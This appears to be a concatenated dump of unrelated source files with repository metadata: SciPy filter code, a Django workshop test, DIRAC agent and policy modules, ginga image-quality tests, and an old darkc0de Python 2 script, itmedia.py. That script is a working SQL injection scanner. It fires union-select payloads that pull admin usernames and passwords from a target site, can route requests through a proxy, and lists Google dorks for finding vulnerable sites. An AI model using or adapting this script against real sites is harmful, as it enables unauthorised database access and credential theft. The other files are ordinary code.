if rank < 0 or rank >= filter_size:
raise RuntimeError('rank not within filter footprint size')
if rank == 0:
return minimum_filter(input, None, footprint, output, mode, cval,
origins)
elif rank == filter_size - 1:
return maximum_filter(input, None, footprint, output, mode, cval,
origins)
else:
output, return_value = _ni_support._get_output(output, input)
mode = _ni_support._extend_mode_to_code(mode)
_nd_image.rank_filter(input, rank, footprint, output, mode, cval,
origins)
return return_value
@docfiller
def rank_filter(input, rank, size=None, footprint=None, output=None,
mode="reflect", cval=0.0, origin=0):
"""Calculates a multi-dimensional rank filter.
Parameters
----------
%(input)s
rank : integer
The rank parameter may be less then zero, i.e., rank = -1
indicates the largest element.
%(size_foot)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
"""
return _rank_filter(input, rank, size, footprint, output, mode, cval,
origin, 'rank')
@docfiller
def median_filter(input, size=None, footprint=None, output=None,
mode="reflect", cval=0.0, origin=0):
"""
Calculates a multidimensional median filter.
Parameters
----------
%(input)s
%(size_foot)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
Returns
-------
median_filter : ndarray
Return of same shape as `input`.
"""
return _rank_filter(input, 0, size, footprint, output, mode, cval,
origin, 'median')
@docfiller
def percentile_filter(input, percentile, size=None, footprint=None,
output=None, mode="reflect", cval=0.0, origin=0):
"""Calculates a multi-dimensional percentile filter.
Parameters
----------
%(input)s
percentile : scalar
The percentile parameter may be less then zero, i.e.,
percentile = -20 equals percentile = 80
%(size_foot)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
"""
return _rank_filter(input, percentile, size, footprint, output, mode,
cval, origin, 'percentile')
@docfiller
def generic_filter1d(input, function, filter_size, axis=-1,
output=None, mode="reflect", cval=0.0, origin=0,
extra_arguments=(), extra_keywords = None):
"""Calculate a one-dimensional filter along the given axis.
`generic_filter1d` iterates over the lines of the array, calling the
given function at each line. The arguments of the line are the
input line, and the output line. The input and output lines are 1D
double arrays. The input line is extended appropriately according
to the filter size and origin. The output line must be modified
in-place with the result.
Parameters
----------
%(input)s
function : callable
Function to apply along given axis.
filter_size : scalar
Length of the filter.
%(axis)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
%(extra_arguments)s
%(extra_keywords)s
"""
if extra_keywords is None:
extra_keywords = {}
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
output, return_value = _ni_support._get_output(output, input)
if filter_size < 1:
raise RuntimeError('invalid filter size')
axis = _ni_support._check_axis(axis, input.ndim)
if ((filter_size // 2 + origin < 0) or
(filter_size // 2 + origin >= filter_size)):
raise ValueError('invalid origin')
mode = _ni_support._extend_mode_to_code(mode)
_nd_image.generic_filter1d(input, function, filter_size, axis, output,
mode, cval, origin, extra_arguments, extra_keywords)
return return_value
@docfiller
def generic_filter(input, function, size=None, footprint=None,
output=None, mode="reflect", cval=0.0, origin=0,
extra_arguments=(), extra_keywords = None):
"""Calculates a multi-dimensional filter using the given function.
At each element the provided function is called. The input values
within the filter footprint at that element are passed to the function
as a 1D array of double values.
Parameters
----------
%(input)s
function : callable
Function to apply at each element.
%(size_foot)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
%(extra_arguments)s
%(extra_keywords)s
"""
if extra_keywords is None:
extra_keywords = {}
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
origins = _ni_support._normalize_sequence(origin, input.ndim)
if footprint is None:
if size is None:
raise RuntimeError("no footprint or filter size provided")
sizes = _ni_support._normalize_sequence(size, input.ndim)
footprint = numpy.ones(sizes, dtype=bool)
else:
footprint = numpy.asarray(footprint)
footprint = footprint.astype(bool)
fshape = [ii for ii in footprint.shape if ii > 0]
if len(fshape) != input.ndim:
raise RuntimeError('filter footprint array has incorrect shape.')
for origin, lenf in zip(origins, fshape):
if (lenf // 2 + origin < 0) or (lenf // 2 + origin >= lenf):
raise ValueError('invalid origin')
if not footprint.flags.contiguous:
footprint = footprint.copy()
output, return_value = _ni_support._get_output(output, input)
mode = _ni_support._extend_mode_to_code(mode)
_nd_image.generic_filter(input, function, footprint, output, mode,
cval, origins, extra_arguments, extra_keywords)
return return_value
|
beiko-lab/gengis
|
bin/Lib/site-packages/scipy/ndimage/filters.py
|
Python
|
gpl-3.0
| 39,925
|
[
"Gaussian"
] |
4c2f7292da7788db07bc5d8f893c48e98dc468d800e4a2b1a4db71e2ba1e096f
|
from datetime import datetime, timedelta
import re
from wye.base.constants import WorkshopStatus
from .. import factories as f
def test_workshop_flow(base_url, browser, outbox):
user = f.create_user()
user.set_password('123123')
user.save()
url = base_url + '/workshop/'
browser.visit(url)
browser.fill('login', user.email)
browser.fill('password', '123123')
browser.find_by_css('[type=submit]')[0].click()
assert len(outbox) == 1
mail = outbox[0]
confirm_link = re.findall(r'http.*/accounts/.*/', mail.body)
assert confirm_link
browser.visit(confirm_link[0])
assert browser.title, "Confirm E-mail Address"
browser.find_by_css('[type=submit]')[0].click()
poc_type = f.create_usertype(slug='poc', display_name='poc')
user.profile.usertype.add(poc_type)
user.save()
org = f.create_organisation()
org.user.add(user)
user.profile.interested_locations.add(org.location)
org.save()
workshop = f.create_workshop(requester=org)
workshop.expected_date = datetime.now() + timedelta(days=20)
# workshop.presenter.add(user)
workshop.status = WorkshopStatus.REQUESTED
workshop.location = org.location
workshop.save()
url = base_url + '/workshop/update/{}/'.format(workshop.id)
browser.visit(url)
browser.fill('login', user.email)
browser.fill('password', '123123')
browser.find_by_css('[type=submit]')[0].click()
tutor_type = f.create_usertype(slug='tutor', display_name='tutor')
user.profile.usertype.remove(poc_type)
user.profile.usertype.add(tutor_type)
user.save()
url = base_url + '/workshop/'
browser.visit(url)
accept_workshop_link = browser.find_by_text('Accept')[0]
assert accept_workshop_link
accept_workshop_link.click()
reject_workshop_link = browser.find_by_text('Reject')[0]
assert reject_workshop_link
reject_workshop_link.click()
user.profile.usertype.remove(tutor_type)
user.profile.usertype.add(poc_type)
user.save()
# hold_workshop_link = browser.find_by_text('Hold')[0]
# assert hold_workshop_link
# hold_workshop_link.click()
# publish_workshop_link = browser.find_by_text('Publish/Request')[0]
# assert publish_workshop_link
# publish_workshop_link.click()
workshop.expected_date = datetime.now() + timedelta(days=-20)
workshop.save()
url = base_url + '/workshop/'
browser.visit(url)
f.create_workshop_rating()
publish_workshop_link = browser.find_by_text('Share Feedback')[0]
assert publish_workshop_link
publish_workshop_link.click()
url = base_url + '/workshop/feedback/{}'.format(workshop.id)
browser.visit(url)
browser.check('rating0-1')
browser.fill('comment', "Testing comments")
browser.find_by_css('[type=submit]')[0].click()
|
DESHRAJ/wye
|
tests/functional/test_workshops_flow.py
|
Python
|
mit
| 2,827
|
[
"VisIt"
] |
70b448b59896b71eefd8bf4650746ca8393b5a2e8fd575b13d1094cacfbcca83
|
#!/usr/bin/python
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# !!! Special thanx for d3hydr8 and rsauron who inspired me !!!
#
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #
# --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear #
# --- Eliminator and to all members of darkc0de and ljuska.org# #
################################################################
import sys, os, time, re, urllib2, httplib, socket
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
proxy = "None"
count = 0
if len(sys.argv) < 2 or len(sys.argv) > 4:
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 ITmedia |"
print "| Help: itmedia.py -h |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)
for arg in sys.argv:
if arg == '-h':
print "\n|-------------------------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 ITmedia |"
print "| Usage: itmedia.py www.site.com |"
print "| Example: itmedia.py http://www.blagoleks.net |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|-------------------------------------------------------------------------------|\n"
sys.exit(1)
elif arg == '-p':
proxy = sys.argv[count+1]
count += 1
site = sys.argv[1]
if site[:4] != "http":
site = "http://"+site
if site[-1] != "/":
site = site+"/"
vulnsql = ["vijest.php?id=-1+union+all+select+1,concat_ws(char(58),user,pass,0x62616c74617a6172),3,4,5,6,7+from+admin--","vijesti.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172)+from+admin--","vijest.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172),4,5,6,7,8,9,10+from+admin--","galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass,0x62616c74617a6172)+from+admin--","galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass,0x62616c74617a6172),4,5+from+admin--","ponuda.php?op=slika&ids=-1+union+all+select+1,concat_ws(char(58),user,pass,0x62616c74617a6172),3+from+admin--","ponuda.php?op=kategorija&id=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172),4+from+admin--","slike.php?op=slika&ids=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172),4,5+from+admin--"]
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 ITmedia |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")
socket.setdefaulttimeout(20)
try:
if proxy != "None":
print "[+] Proxy:",proxy
print "\n[+] Testing Proxy..."
pr = httplib.HTTPConnection(proxy)
pr.connect()
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
proxyfier = urllib2.build_opener(proxy_handler)
proxyfier.open("http://www.google.com")
print
print "\t[!] w00t!,w00t! Proxy: "+proxy+" Working"
print
else:
print "[-] Proxy not given"
print
proxy_handler = ""
except(socket.timeout):
print
print "\t[-] Proxy Timed Out"
print
sys.exit(1)
except(),msg:
print msg
print "\t[-] Proxy Failed"
print
sys.exit(1)
try:
url = "http://antionline.com/tools-and-toys/ip-locate/index.php?address="
except(IndexError):
print "[-] Wtf?"
proxyfier = urllib2.build_opener(proxy_handler)
proxy_check = proxyfier.open(url).readlines()
for line in proxy_check:
if re.search("<br><br>", line):
line = line.replace("</b>","").replace('<br>',"").replace('<b>',"")
print "\n[!]",line,"\n"
print "[+] Target:",site
print "[+]",len(vulnsql),"Vulns loaded..."
print "[+] Starting Scan..\n"
for sql in vulnsql:
print "[+] Checking:",site+sql.replace("\n","")
print
try:
source = proxyfier.open(site+sql.replace("\n", "")).read()
search = re.findall("baltazar",source)
if len(search) > 0:
print "[!] w00t!w00t" ,site+sql.replace("\n", "")
print
except(KeyboardInterrupt, SystemExit):
raise
except:
pass
print
print
print
print """\tDork : inurl:/galerija.php?op=slika
inurl:/ponuda.php?op=slika
inurl:/vijest.php?id= intext:itmedia
inurl:/slike.php?op=slika
"""
print
print "Check for more details: http://packetstormsecurity.org/0808-exploits/itmedia-sql.txt"
print "\n[-] %s" % time.strftime("%X")
|
knightmare2600/d4rkc0de
|
exploits/090117.py
|
Python
|
gpl-2.0
| 6,260
|
[
"VisIt"
] |
d982e49874f6ff8dd43e152eb2bca389923d45cf6c7e861479007cb60d9808d6
|
""" Contains a class used for evaluating policies for accessing jobs/WMS/pilots accounting
"""
__RCSID__ = "$Id$"
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.Security import Properties
from DIRAC.AccountingSystem.private.Policies.FilterExecutor import FilterExecutor
class JobPolicy( object ):
def __init__( self ):
self.__executor = FilterExecutor()
self.__executor.addGlobalFilter( self.__checkConditions )
def getListingConditions( self, credDict ):
condDict = {}
userProps = credDict[ 'properties' ]
if Properties.JOB_ADMINISTRATOR in userProps:
return condDict
elif Properties.JOB_MONITOR in userProps:
return condDict
elif Properties.JOB_SHARING in userProps:
condDict[ 'UserGroup' ] = [ credDict[ 'group' ] ]
return condDict
def checkRequest( self, iD, credDict, condDict, groupingList ):
return self.__executor.applyFilters( iD, credDict, condDict, groupingList )
def __checkConditions( self, credDict, condDict, groupingField ):
userProps = credDict[ 'properties' ]
if Properties.JOB_ADMINISTRATOR in userProps:
return S_OK()
elif Properties.JOB_MONITOR in userProps:
return S_OK()
elif Properties.JOB_SHARING in userProps:
if 'User' in condDict:
condDict[ 'UserGroup' ] = credDict[ 'group' ]
if 'User' == groupingField:
condDict[ 'UserGroup' ] = credDict[ 'group' ]
if 'UserGroup' in condDict:
condDict[ 'UserGroup' ] = credDict[ 'group' ]
if 'UserGroup' == groupingField:
condDict[ 'UserGroup' ] = credDict[ 'group' ]
elif Properties.NORMAL_USER in userProps:
if 'User' in condDict:
condDict[ 'User' ] = credDict[ 'username' ]
if 'User' == groupingField:
condDict[ 'User' ] = credDict[ 'username' ]
if 'UserGroup' in condDict:
condDict[ 'User' ] = credDict[ 'username' ]
condDict[ 'UserGroup' ] = credDict[ 'group' ]
if 'UserGroup' == groupingField:
condDict[ 'User' ] = credDict[ 'username' ]
condDict[ 'UserGroup' ] = credDict[ 'group' ]
else:
condDict['User'] = credDict['username']
else:
if 'User' in condDict:
del( condDict[ 'User' ] )
if 'UserGroup' in condDict:
del( condDict[ 'UserGroup' ] )
if 'User' == groupingField:
return S_ERROR( "You can't group plots by users! Bad boy!" )
if 'UserGroup' == groupingField:
return S_ERROR( "You can't group plots by user groups! Bad boy!" )
return S_OK()
def filterListingValues( self, credDict, dataDict ):
userProps = credDict[ 'properties' ]
if Properties.JOB_ADMINISTRATOR in userProps:
return S_OK( dataDict )
elif Properties.JOB_MONITOR in userProps:
return S_OK( dataDict )
elif Properties.JOB_SHARING in userProps:
return S_OK( dataDict )
elif Properties.NORMAL_USER in userProps:
return S_OK( dataDict )
dataDict[ 'User' ] = []
dataDict[ 'UserGroup' ] = []
return S_OK( dataDict )
|
fstagni/DIRAC
|
AccountingSystem/private/Policies/JobPolicy.py
|
Python
|
gpl-3.0
| 3,030
|
[
"DIRAC"
] |
51a6191c77dbd67caeffc82d1923ec73f78124017a0e1f41d4d0d08adc8429e4
|
########################################################################
# $HeadURL$
# File : AgentReactor.py
# Author : Adria Casajus
########################################################################
"""
DIRAC class to execute Agents
Agents are the active part any any DIRAC system, they execute in a cyclic
manner looking at the state of the system and reacting to it by taken
appropriated actions
All DIRAC Agents must inherit from the basic class AgentModule
In the most common case, DIRAC Agents are executed using the dirac-agent command.
dirac-agent accepts a list positional arguments. These arguments have the form:
[DIRAC System Name]/[DIRAC Agent Name]
dirac-agent then:
- produces a instance of AgentReactor
- loads the required modules using the AgentReactor.loadAgentModules method
- starts the execution loop using the AgentReactor.go method
Agent modules must be placed under the Agent directory of a DIRAC System.
DIRAC Systems are called XXXSystem where XXX is the [DIRAC System Name], and
must inherit from the base class AgentModule
"""
__RCSID__ = "$Id$"
import time
import os
from DIRAC import S_OK, S_ERROR, gLogger, rootPath
from DIRAC.ConfigurationSystem.Client import PathFinder
from DIRAC.Core.Base.private.ModuleLoader import ModuleLoader
from DIRAC.Core.Utilities import ThreadScheduler
from DIRAC.ConfigurationSystem.Client.Helpers import getInstalledExtensions
from DIRAC.Core.Base.AgentModule import AgentModule
class AgentReactor:
"""
Main interface to DIRAC Agents. It allows to :
- define a Agents modules to be executed
- define the number of cycles to execute
- steer the execution
Agents are declared via:
- loadAgentModule(): for a single Agent
- loadAgentModules(): for a list of Agents
The number of cycles to execute for a defined Agent can be set via:
- setAgentModuleCyclesToExecute()
The execution of the Agents is done with:
- runNumCycles(): to execute an additional number of cycles
- go():
During the execution of the cycles, each of the Agents can be signaled to stop
by creating a file named "stop_agent" in its Control Directory.
"""
def __init__( self, baseAgentName ):
self.__agentModules = {}
self.__loader = ModuleLoader( "Agent", PathFinder.getAgentSection, AgentModule )
self.__tasks = {}
self.__baseAgentName = baseAgentName
self.__scheduler = ThreadScheduler.ThreadScheduler( enableReactorThread = False,
minPeriod = 30 )
self.__alive = True
self.__running = False
def loadAgentModules( self, modulesList, hideExceptions = False ):
"""
Load all modules required in moduleList
"""
result = self.__loader.loadModules( modulesList, hideExceptions = hideExceptions )
if not result[ 'OK' ]:
return result
self.__agentModules = self.__loader.getModules()
for agentName in self.__agentModules:
agentData = self.__agentModules[ agentName ]
agentData[ 'running' ] = False
try:
instanceObj = agentData[ 'classObj' ]( agentName, agentData[ 'loadName' ], self.__baseAgentName )
result = instanceObj.am_initialize()
if not result[ 'OK' ]:
return S_ERROR( "Error while calling initialize method of %s: %s" % ( agentName, result[ 'Message' ] ) )
agentData[ 'instanceObj' ] = instanceObj
except Exception, excp:
if not hideExceptions:
gLogger.exception( "Can't load agent %s" % agentName )
return S_ERROR( "Can't load agent %s: \n %s" % ( agentName, excp ) )
agentPeriod = instanceObj.am_getPollingTime()
result = self.__scheduler.addPeriodicTask( agentPeriod, instanceObj.am_go,
executions = instanceObj.am_getMaxCycles(),
elapsedTime = agentPeriod )
if not result[ 'OK' ]:
return result
taskId = result[ 'Value' ]
self.__tasks[ result[ 'Value' ] ] = agentName
agentData[ 'taskId' ] = taskId
agentData[ 'running' ] = True
if not self.__agentModules:
return S_ERROR( "No agent module loaded" )
return S_OK()
def runNumCycles( self, agentName = None, numCycles = 1 ):
"""
Run all defined agents a given number of cycles
"""
if agentName:
self.loadAgentModules( [ agentName ] )
error = ''
for aName in self.__agentModules:
result = self.setAgentModuleCyclesToExecute( aName, numCycles )
if not result['OK']:
error = 'Failed to set cycles to execute'
gLogger.error( '%s:' % error, aName )
break
if error:
return S_ERROR( error )
self.go()
return S_OK()
def __finalize( self ):
"""
Execute the finalize method of all Agents
"""
for agentName in self.__agentModules:
try:
self.__agentModules[agentName]['instanceObj'].finalize()
except Exception:
gLogger.exception( 'Failed to execute finalize for Agent:', agentName )
def go( self ):
"""
Main method to control the execution of all configured Agents
"""
if self.__running:
return
self.__running = True
try:
while self.__alive:
self.__checkControlDir()
timeToNext = self.__scheduler.executeNextTask()
if timeToNext == None:
gLogger.info( "No more agent modules to execute. Exiting" )
break
time.sleep( min( max( timeToNext, 0.5 ), 5 ) )
finally:
self.__running = False
self.__finalize()
def setAgentModuleCyclesToExecute( self, agentName, maxCycles = 1 ):
"""
Set number of cycles to execute for a given agent (previously defined)
"""
if not agentName in self.__agentModules:
return S_ERROR( "%s has not been loaded" % agentName )
if maxCycles:
try:
maxCycles += self.__agentModules[ agentName ][ 'instanceObj' ].am_getCyclesDone()
except Exception:
error = 'Can not determine number of cycles to execute'
gLogger.exception( '%s:' % error, '"%s"' % maxCycles )
return S_ERROR( error )
self.__agentModules[ agentName ][ 'instanceObj' ].am_setOption( 'MaxCycles', maxCycles )
self.__scheduler.setNumExecutionsForTask( self.__agentModules[ agentName ][ 'taskId' ],
maxCycles )
return S_OK()
def __checkControlDir( self ):
"""
Check for the presence of stop_agent file to stop execution of the corresponding Agent
"""
for agentName in self.__agentModules:
if not self.__agentModules[ agentName ][ 'running' ]:
continue
agent = self.__agentModules[ agentName ][ 'instanceObj' ]
alive = agent.am_getModuleParam( 'alive' )
if alive:
if agent.am_checkStopAgentFile():
gLogger.info( "Found StopAgent file for agent %s" % agentName )
alive = False
if not alive:
gLogger.info( "Stopping agent module %s" % ( agentName ) )
self.__scheduler.removeTask( self.__agentModules[ agentName ][ 'taskId' ] )
del( self.__tasks[ self.__agentModules[ agentName ][ 'taskId' ] ] )
self.__agentModules[ agentName ][ 'running' ] = False
agent.am_removeStopAgentFile()
|
Sbalbp/DIRAC
|
Core/Base/AgentReactor.py
|
Python
|
gpl-3.0
| 7,331
|
[
"DIRAC"
] |
3e875e46d2a5316e287aa15be9a61e599750ccc6c73f61dbfebcd52bfb38c0c4
|
import logging
import numpy as np
import pytest
from numpy.testing import assert_allclose, assert_array_equal
from ginga.AstroImage import AstroImage
from ginga.util import iqcalc, iqcalc_astropy
from ginga.util.iqcalc import have_scipy # noqa
from ginga.util.iqcalc_astropy import have_photutils # noqa
@pytest.mark.parametrize(
('arr', 'ans'),
[(np.arange(5), 2),
(np.array([1, np.inf, 3, np.nan, 5]), 3),
(np.arange(10).reshape(2, 5), 4.5)])
def test_get_mean_median(arr, ans):
assert iqcalc.get_mean(arr) == ans
assert iqcalc.get_median(arr) == ans
def test_get_mean_median_nan():
arr = np.array([np.nan, np.inf])
assert np.isnan(iqcalc.get_mean(arr))
assert np.isnan(iqcalc.get_median(arr))
def test_get_mean_mask():
"""Test that a partially masked array works with get_mean()"""
arr = np.array([-5, 4, 0, 3, -2, 7, 10, -10, 5, 6])
m_arr = np.ma.masked_where(arr < 0, arr)
assert_allclose(iqcalc.get_mean(m_arr), 5.0)
def test_get_median_mask():
"""Test that a partially masked array works with get_median()"""
arr = np.array([-5, 4, 0, 3, 1, -2, 7, 10, -10, 5, 6, -1])
m_arr = np.ma.masked_where(arr < 0, arr)
assert_allclose(iqcalc.get_median(m_arr), 4.5)
class TestIQCalcNoInherit:
"""IQCalc tests that do not need corresponding tests for Astropy.
If the method is re-implemented in iqcalc_astropy, move the test method
to `TestIQCalc`.
"""
def setup_class(self):
logger = logging.getLogger("TestIQCalc")
self.iqcalc = iqcalc.IQCalc(logger=logger)
self.data = np.arange(100).reshape((10, 10))
def test_starsize(self):
fwhm = self.iqcalc.starsize(1.0, -1.6e-5, 3.5, 1.5e-5)
assert_allclose(fwhm, 0.12329999999999999)
def test_cut_region(self):
x0, y0, arr = self.iqcalc.cut_region(5, 7, 5, self.data)
assert (x0, y0) == (0, 2)
assert_array_equal(arr, self.data[2:, :])
def test_cut_cross(self):
x0, y0, xarr, yarr = self.iqcalc.cut_cross(1, 4, 3, self.data)
assert x0 == 0
assert y0 == 1
assert_array_equal(xarr, [40, 41, 42, 43, 44])
assert_array_equal(yarr, [11, 21, 31, 41, 51, 61, 71])
def test_brightness(self):
assert_allclose(self.iqcalc.brightness(5, 4, 3, 0, self.data), 66)
@pytest.mark.skipif('not have_scipy')
def test_ee_odd(self):
data = np.ma.array(
[[0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 10, 1, 1, 0],
[0, 1, 2, 3, 2, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 100, 0, 0, 0]],
mask=[[False, False, False, False, False, False, False],
[False, False, False, False, False, False, False],
[False, False, False, True, False, False, False],
[False, False, False, False, False, False, False],
[False, False, False, False, False, False, False],
[False, False, False, False, False, False, False],
[False, False, False, True, False, False, False]])
for fn in (self.iqcalc.ensquared_energy, self.iqcalc.encircled_energy):
interp_fn = fn(data)
assert_allclose(interp_fn.x, [0, 1, 2, 3])
assert_allclose(interp_fn.y, [0.10714286, 0.42857143, 1, 1])
@pytest.mark.skipif('not have_scipy')
def test_ee_even(self):
data = np.ma.array(
[[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 1, 2, 2, 2, 2, 1, 0],
[0, 1, 2, 3, 10, 2, 1, 0],
[0, 1, 2, 3, 3, 2, 1, 0],
[0, 1, 2, 2, 2, 2, 1, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 100, 0, 0, 0, 0]],
mask=[[False, False, False, False, False, False, False, False],
[False, False, False, False, False, False, False, False],
[False, False, False, False, False, False, False, False],
[False, False, False, False, True, False, False, False],
[False, False, False, False, False, False, False, False],
[False, False, False, False, False, False, False, False],
[False, False, False, False, False, False, False, False],
[False, False, False, True, False, False, False, False]])
fn_sq = self.iqcalc.ensquared_energy(data)
assert_allclose(fn_sq.x, [0, 1, 2, 3])
assert_allclose(fn_sq.y, [0.16981132, 0.62264151, 1, 1])
fn_circ = self.iqcalc.encircled_energy(data)
assert_allclose(fn_circ.x, [0, 1, 2, 3])
assert_allclose(fn_circ.y, [0.16981132, 0.47169811, 0.9245283, 1])
@pytest.mark.skipif('not have_scipy')
class TestIQCalcPhot:
# Shared attributes that subclass can access.
logger = logging.getLogger("TestIQCalc")
# This is taken from subset of array mentioned in
# https://photutils.readthedocs.io/en/stable/detection.html#detecting-stars
data = np.array(
[[3961, 4143, 3780, 3871, 3871, 3871, 3508, 3780, 3780, 3780, 3780],
[3961, 3961, 3598, 3961, 3961, 3780, 3780, 3780, 3780, 3780, 3780],
[3961, 3961, 3598, 3961, 3961, 4143, 4143, 3780, 3780, 3780, 3780],
[3780, 3961, 3961, 4143, 4506, 5776, 5413, 3961, 3961, 3961, 3961],
[3780, 3961, 3961, 4143, 5232, 9043, 7954, 4687, 3961, 3598, 3598],
[3939, 4302, 4302, 4211, 5300, 7659, 6933, 4710, 3984, 3621, 3621],
[3939, 3939, 3939, 3848, 4211, 4392, 4392, 3984, 3984, 3621, 3621],
[3757, 3757, 3757, 4029, 3666, 4029, 3666, 3803, 3803, 3621, 3621],
[3757, 3757, 3757, 3666, 4029, 4029, 3666, 3803, 3803, 3621, 3621],
[4120, 3939, 3576, 3757, 3757, 3576, 3576, 3712, 3712, 3530, 3530],
[4120, 3939, 3576, 3757, 3757, 3576, 3576, 3712, 3712, 3530, 3530]])
# This is taken from photutils find_peaks test.
PEAKDATA = np.array([[1, 0, 0], [0, 0, 0], [0, 0, 1]]).astype(float)
PEAKREF1 = [(0, 0), (2, 2)]
def setup_class(self):
self.iqcalc = iqcalc.IQCalc(logger=self.logger)
def test_centroid(self):
# We are not testing cut region here, so we use all the data.
xycen = self.iqcalc.centroid(self.data, 5, 5, 5)
assert_allclose(xycen, (4.960327886939483, 4.922639686006575))
def test_find_bright_peaks_default_pars(self):
# Also tests get_threshold indirectly.
peaks = self.iqcalc.find_bright_peaks(self.data)
max_xy = [(5, 4)]
assert_array_equal(peaks, max_xy)
def test_find_bright_peaks_no_mask(self):
peaks = self.iqcalc.find_bright_peaks(
self.PEAKDATA, threshold=0.1, radius=1)
assert_array_equal(peaks, self.PEAKREF1)
def test_find_bright_peaks_masked(self):
mask = np.zeros(self.PEAKDATA.shape, dtype=bool)
mask[0, 0] = True
data = np.ma.array(self.PEAKDATA, mask=mask)
peaks = self.iqcalc.find_bright_peaks(data, threshold=0.1, radius=1)
assert_array_equal(peaks, [self.PEAKREF1[1]])
def test_fwhm_data(self):
fwhm_x, fwhm_y, ctr_x, ctr_y, x_res, y_res = self.iqcalc.fwhm_data(
5, 4, self.data, radius=3, method_name='gaussian')
# Relax tolerance for TestIQCalcPhotAstropy
assert_allclose(fwhm_x, 1.9671665379707803, rtol=2e-7)
assert_allclose(fwhm_y, 2.054971090163851, rtol=2e-7)
assert_allclose(ctr_x, 5.353724230524191, rtol=2e-7)
assert_allclose(ctr_y, 4.248692873436124, rtol=2e-7)
assert_allclose(x_res['sdev'], 0.8353787127478465, rtol=2e-7)
assert_allclose(y_res['sdev'], 0.8726658729188976, rtol=2e-7)
def test_photometry(self):
objlist = self.iqcalc.evaluate_peaks(
[(5, 4)], self.data, fwhm_radius=1.5, ee_total_radius=3)
assert len(objlist) == 1
result_1 = objlist[0]
result_2 = self.iqcalc.pick_field(
self.data, fwhm_radius=1.5, ee_total_radius=3)
astroim = AstroImage(data_np=self.data, logger=self.iqcalc.logger)
result_3 = self.iqcalc.qualsize(
astroim, fwhm_radius=1.5, ee_total_radius=3)
# Relax tolerance for TestIQCalcPhotAstropy
for res in (result_1, result_2, result_3):
assert_allclose(res.objx, 5.353330481192139)
assert_allclose(res.objy, 4.2480576624213455)
assert_allclose(res.pos, 0.9967616536846655)
assert_allclose(res.oid_x, 5.091012868410129)
assert_allclose(res.oid_y, 4.072592361975923)
assert_allclose(res.fwhm_x, 1.9625726210572922, rtol=5e-7)
assert_allclose(res.fwhm_y, 2.0491919125821827, rtol=5e-7)
assert_allclose(res.fwhm, 2.0063497685493314, rtol=5e-7)
assert res.fwhm_radius == 1.5
assert_allclose(res.brightness, 5234.639533977552)
assert_allclose(res.elipse, 0.9577300247024001, rtol=1e-6)
assert res.x == 5
assert res.y == 4
assert_allclose(res.skylevel, 4033.15)
assert_allclose(res.background, 3803)
assert_allclose(res.encircled_energy_fn(1.5), 0.88921253)
assert_allclose(res.ensquared_energy_fn(1.5), 0.88976561)
result_4 = self.iqcalc.qualsize(astroim, x1=1, y1=1, x2=10, y2=10, fwhm_radius=1.5, minfwhm=1.8)
# A bit different for result_4 due to slightly truncated data.
# Relax tolerance for TestIQCalcPhotAstropy
assert_allclose(result_4.objx, 5.35505379856564)
assert_allclose(result_4.objy, 4.25153281221611)
assert_allclose(result_4.pos, 0.9951892891389722)
assert_allclose(result_4.oid_x, 4.091012868410129)
assert_allclose(result_4.oid_y, 3.072592361975923)
assert_allclose(result_4.fwhm_x, 1.8788622094597287, rtol=5e-7)
assert_allclose(result_4.fwhm_y, 1.9727658817644915, rtol=5e-7)
assert_allclose(result_4.fwhm, 1.926386309439247, rtol=5e-7)
assert result_4.fwhm_radius == 1.5
assert_allclose(result_4.brightness, 5097.983320858308)
assert_allclose(result_4.elipse, 0.9523999917208762, rtol=1e-6)
assert result_4.x == 5
assert result_4.y == 4
assert_allclose(result_4.skylevel, 4199.05)
assert_allclose(result_4.background, 3961)
assert result_4.encircled_energy_fn is None
